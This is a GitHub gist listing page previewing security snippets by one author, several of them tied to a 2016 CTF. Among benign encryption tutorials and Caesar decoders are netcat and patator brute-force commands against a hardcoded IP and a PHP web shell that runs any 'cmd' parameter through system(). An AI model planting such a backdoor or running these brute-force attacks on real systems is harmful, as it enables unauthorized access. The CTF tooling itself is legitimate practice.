@intrd
intrd / tutorial_disk_encryption.txt
Last active April 26, 2023 12:26
Tutorial - Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
## Linux disk encryption (/home folder + /tmp with ecryptfs, plus swap partitions w/ dm-crypt)
# @author intrd - http://dann.com.br/
Why not full disk encryption?
This setup is for systems that need performance.
Tested on an Ubuntu system with an existing user.
As root:
# apt-get install ecryptfs-utils cryptsetup
# apt-get install lsof
@intrd
intrd / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Last active June 27, 2023 15:57
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burp Suite proxy w/ rewriting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burp Suite proxy w/ rewriting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## Burp csrf-rewriting macro
- Session handling rules = new macro; tick "Tolerate URL mismatch when matching parameters".
Create a macro rule over method GET, extract a custom parameter with parameter name = _csrf,
start the extraction after the expression value=" and end at the delimiter ", configure the scope for the domain and enable it for Proxy.
Open the session tracker to test. (For an Intruder bruteforce, you need to untick "Make unmodified baseline request".)
- Proxy options = enable the cookie jar for Proxy; if that does not work, enable invisible proxying.
@intrd
intrd / base64_caesar.py
Last active March 3, 2017 06:03
Caesar base64(rotn) visual bruteforce
## Caesar base64(rotn) visual bruteforce
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import base64, string
def caesar_int(ch, shift):
    n = ord(ch)
    if ord('a') <= n <= ord('z'):
        n = n - ord('a')
@intrd
intrd / int_netcat.py
Last active August 8, 2017 15:45
intrd's netcat python socket
## intrd's netcat python socket (v1.1)
# @author intrd - http://dann.com.br/ (original: http://stackoverflow.com/a/36419867)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import socket, socks, time
class Netcat:
    def __init__(self, ip, port, timeo=10, scks=False):
        self.buff = ""
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@intrd
intrd / tutorial_kali_autologin_afterupdate.txt
Last active January 28, 2024 06:32
Kali light xfce4 root autologin (works after lightdm update)
## Kali light xfce4 root autologin (works after lightdm update)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
Root autologin is broken after the lightdm update; fix it by doing this:
nano /etc/lightdm/lightdm.conf
In the [Seat:*] group, uncomment/edit:
autologin-user=root
autologin-user-timeout=0
@intrd
intrd / int_caesar.py
Last active March 3, 2017 06:02
Caesar script used in crypto100-hotsun @ 3dsctf-2k16
## Caesar script used in crypto100-hotsun @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import base64, string
def int_caesar(ch, shift):
    n = ord(ch)
    if ord('a') <= n <= ord('z'):
        n = n - ord('a')
@intrd
intrd / nc_bruteforce.sh
Last active June 28, 2022 08:41
Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
#!/bin/bash
## Netcat bruteforce script used in crypto100-master @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
for letter in {A..Z} ; do
    echo $letter
    sleep 1
    (echo "yes" & sleep 1 & echo "$letter") | nc -i1 -w5 54.175.35.248 8002
done
@intrd
intrd / mapos_bf.sh
Last active March 3, 2017 06:02
Mapos patator bruteforce script used in web200-mapos @ 3dsctf-2k16
## Mapos patator bruteforce script used in web200-mapos @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# patator.py - https://github.com/lanjelot/patator
python ~/appz/patator/patator.py http_fuzz url="http://54.175.35.248:8008/index.php/mapos/verificarLogin?ajax=true" \
method=POST body='email=admin%40admin.com&senha=FILE0' 0=~/dics/rockyou.txt \
follow=0 accept_cookie=1 --threads=2 \
-x quit:fgrep!="Disallowed Key Characters.",fgrep!='esult":false' -l data --max-retries=5 --start=3000
@intrd
intrd / php_backdoor.php
Last active October 16, 2021 13:12
PHP backdoor used in web200-mapos @ 3dsctf-2k16
## PHP backdoor used in web200-mapos @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);
    system($cmd);
    echo "</pre>$cmd<pre>";
    die;
@intrd
intrd / base3200.py
Last active March 3, 2017 06:01
base64x50 decoder used in misc100-base3200 @ 3dsctf-2k16
## base64x50 decoder used in misc100-base3200 @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
import base64
# 3200/64 = 50
pontfile='msg.txt'
for x in range(0, 50):
    with open(pontfile, 'r') as f: